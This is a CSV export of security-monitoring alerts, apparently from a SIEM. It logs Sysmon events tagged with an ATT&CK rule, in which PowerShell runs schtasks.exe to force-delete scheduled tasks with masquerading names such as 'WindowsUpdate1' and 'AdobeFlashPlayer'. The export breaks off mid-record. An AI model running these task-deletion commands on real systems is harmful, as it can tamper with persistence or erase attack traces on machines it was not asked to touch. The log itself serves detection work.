""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.207791900Z"",""eventRecordID"":""2491"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.206\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001078871e00}\r\nProcessId: 5196\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.206"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001078871e00}"",""processId"":""5196"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.120",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.177 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010d4851e00} +ProcessId: 2532 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.180810600Z"",""eventRecordID"":""2490"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.177\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010d4851e00}\r\nProcessId: 2532\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.177"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010d4851e00}"",""processId"":""2532"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.106",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.130 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001014841e00} +ProcessId: 4884 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.151197900Z"",""eventRecordID"":""2489"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.130\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001014841e00}\r\nProcessId: 4884\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.130"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001014841e00}"",""processId"":""4884"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.074",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.093 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00108f811e00} +ProcessId: 7312 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.095948100Z"",""eventRecordID"":""2488"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.093\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00108f811e00}\r\nProcessId: 7312\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:04.093"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00108f811e00}"",""processId"":""7312"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.057",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.048 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00102c7f1e00} +ProcessId: 7852 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.050208200Z"",""eventRecordID"":""2487"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.048\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00102c7f1e00}\r\nProcessId: 7852\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.048"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00102c7f1e00}"",""processId"":""7852"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.042",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.024 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010677d1e00} +ProcessId: 8060 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe 
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.026958900Z"",""eventRecordID"":""2486"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.024\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010677d1e00}\r\nProcessId: 8060\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.024"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010677d1e00}"",""processId"":""8060"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.025",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.000 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010337b1e00} +ProcessId: 
